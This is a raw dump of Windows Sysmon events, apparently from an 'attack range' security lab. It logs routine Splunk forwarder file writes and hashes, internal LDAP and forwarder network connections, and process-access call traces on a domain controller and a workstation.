AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299680Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:04.734{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F7DCF60099C00878FA11A64CB794F63,SHA256=EFA227F599E747EEC706CB45D81CD993B1CAA682F975B72C0C24C0669A3B7B01,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299684Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:03.627{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49637-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000299683Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:03.627{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49637-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000299682Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:03.579{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49636-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299681Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:05.764{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C86679AF0D34471B3993513995BDA21,SHA256=80C453DF5FBC999904926D0B74E9BD1910D68D62CA65978AB67689CDBB8441FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223535Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:05.017{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=491A5AE2A898420D937D278E3B5E1D0C,SHA256=8DBECE5E37C00441DB3BFABF7BE69100C6F3F302A76E9163F345E3F8D6874B0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299685Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:06.765{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=550DED92B38F48C04D876AA5638539DF,SHA256=E56173EBD64DB15BB1F9C2BE869A7900C5B964ACA023B772F8441FA30428BC65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223536Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:06.129{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC9B33642F9A737F3632D7C6A5F580AF,SHA256=4D4B58A6871C620FA5CC5D0E81EF954A3FD94224C84635608C7DA78A817C30D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299686Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:07.784{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B40AEB72C7EBE375F2A2A2AE47E6A7FD,SHA256=0EDFE581BD7353112FA5CFE5899856787336A2F108FA35C0A2805778D5D43DB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223537Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:07.141{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD08FF80CCD2130DFF85C4D09C54A601,SHA256=B3A4180F3F84445C41EAA81D6AEB455D6026396D7AAE82E83E790FF17D2C14ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299687Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:08.786{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACCCF377D2B65C5BA11AFA92881EBD9A,SHA256=C027A4440DCF4F2171D373A1BBC240EE4744530BD736AA1B7139B30504948A3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223538Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:08.156{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FC4EB9429404517AE101F4E1DE354F8,SHA256=BCF4DE58D7271D34C9860AD33ABBAB0FEDF91AACAEFA17745282A3E8A8267D28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299688Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:09.816{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F24BD0E528542E42F0B918D0930D34C,SHA256=A09AD1B3F6EE6FD2C8E9673F1609F2EFD2E944D9C8F25BAC0D0D2403E24FF69A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223540Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:07.676{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51793-false10.0.1.12-8000- 23542300x8000000000000000223539Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:09.171{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C45A7A3A7FEBDE21A31D2778C564AF08,SHA256=4E638748FA3BC9A73FCB9BB97E0464FE0D47BE592A5CD7C1F8DF719D9398C946,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299690Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:10.832{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5E0DA2E2AA0BB12CFAD06CAC50DEFA0,SHA256=21475B55FD9B83F32AC572D1E670CDD532ECF5FE8BFDBC2728B81281EC0A5518,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223541Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:10.202{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D1F280BB8CDBED1063FC994B39BD15B,SHA256=F405E46EB0DA1CAE04D94DF5B5713D06DDE167AB6762BDD3234AE2A2ED28B54D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299689Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:08.624{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49638-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299691Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:11.847{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B51C66F13BB98F4D7DF7D7C0D4ACE777,SHA256=B7D7D3A89C1AF5455975052857D27276A6F589AF1AD0F63056AE715EFEC540F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223542Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:11.295{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D33A7CA308D2FB380CEE8E45CD9ECFA5,SHA256=D3F4B89AB9B1889A7A36C30F68AD925E837A847970045E337800749F42D55E93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223543Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:12.528{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F512F94854111084E27596839578000C,SHA256=AF9053C5E008066468193196BEA5AEFB27952BF7D33C65727E95635728308C42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299692Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:12.863{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4BC55B3B7850FE541FEEBEBCE5C3FC4,SHA256=600784F1331D41E72DDA30E17BF6F267B0383DB9F2493CC7D57D8AA6ED507562,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223544Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:13.700{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF93EA7793CBAF0BBFB9F9E81D7384F2,SHA256=B24E6342EBE0CE3A4766332B33AC866B923229E78AF194488C5A10C10FA16A71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299694Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:13.909{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-171MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299693Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:13.865{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BDF7F59F965A7ED659FAF7DD34B01EE,SHA256=DC96B49A232BB3AAB27BF972925660B3F35805BC75CEF484FC8AA3094D6F3CF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223545Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:14.918{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AE3ED086C747C9A5B854185D0AC9DD8,SHA256=D05081C1476A2AF04EDDE89C6D725F44AC439FDC8CB823E80ACE072C05E15842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299696Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:14.919{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-172MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299695Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:14.883{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=473331FF3785EA8E77E311008E37FBE4,SHA256=96FBEF7029FC024A4D794DC134D926B320420822C5420ADB0FD811212AC0F09E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299697Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:15.901{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A3EB709A685DA9FE206527B57F87032,SHA256=D4D5525BF7F375334635825C53A85211618D7CF34FAAD9F76C16C0107F576372,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223546Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:15.995{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95136F9F9F1AC95C6EB7E77DDAD2D355,SHA256=E0B80FC9CE44427E5C5CD1A02FAB3B8885B4B68BCAD7CAE16611949AE2B6C9B8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299699Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:14.541{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49639-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299698Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:16.917{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F42E0B7EDCDD6CEE053A2514257ED30,SHA256=FE8AEEE18296AA6A915067DA938C762E9D2192465FAAA934EA09151EAD8D62E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223547Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:13.547{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51794-false10.0.1.12-8000- 23542300x8000000000000000299700Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:17.932{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0F918C86D29C4479BB3C58B68CEBDA1,SHA256=831B1A20B602CC97639EE2C9D27E9C4F25E54CBBF051B94A61931C7912A2F51F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223548Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:17.010{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D45C47E53E9FDEF1D5CC60A6FD284D55,SHA256=9B73091FA4DC672999AEB9D5D91C890FD0C40310F6F04BA745935062890FA595,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223549Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:18.025{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DC58D169BD7D17F0A38E903A930C432,SHA256=EEAFB9273B37C140ED312B6E296A590A04382D116955BA291A4EDCEDAA8046C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299701Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:18.949{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7765C448D5557BE02D46B8D4445E8246,SHA256=E8E29B62F0269A3A49721CB48495B5EBE09C62A3844FDC93DEA15A51CE544748,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299763Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.961{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A48DB8AB701A88B8E1A29957DEE5DEFF,SHA256=FE7905281DBFBC4530E3650F2B1EC7ADFF5B08548B3B2520727B4D1F977F3D84,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299762Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.961{C8EA50B7-1A8F-6216-8907-000000003802}19407164C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000223550Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:19.040{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=505AA6BE35E66E40652792A77556CB37,SHA256=AE2EA0491BE68FC6FA5490DA33E46C4D24FCF1A38FA56DD0948DEB4C832E4EEF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299761Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.814{C8EA50B7-1A8F-6216-8707-000000003802}47046480C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299760Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.730{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299759Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.730{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A8F-6216-8907-000000003802}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299758Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.698{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1A8F-6216-8907-000000003802}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299757Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.698{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299756Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.698{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299755Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 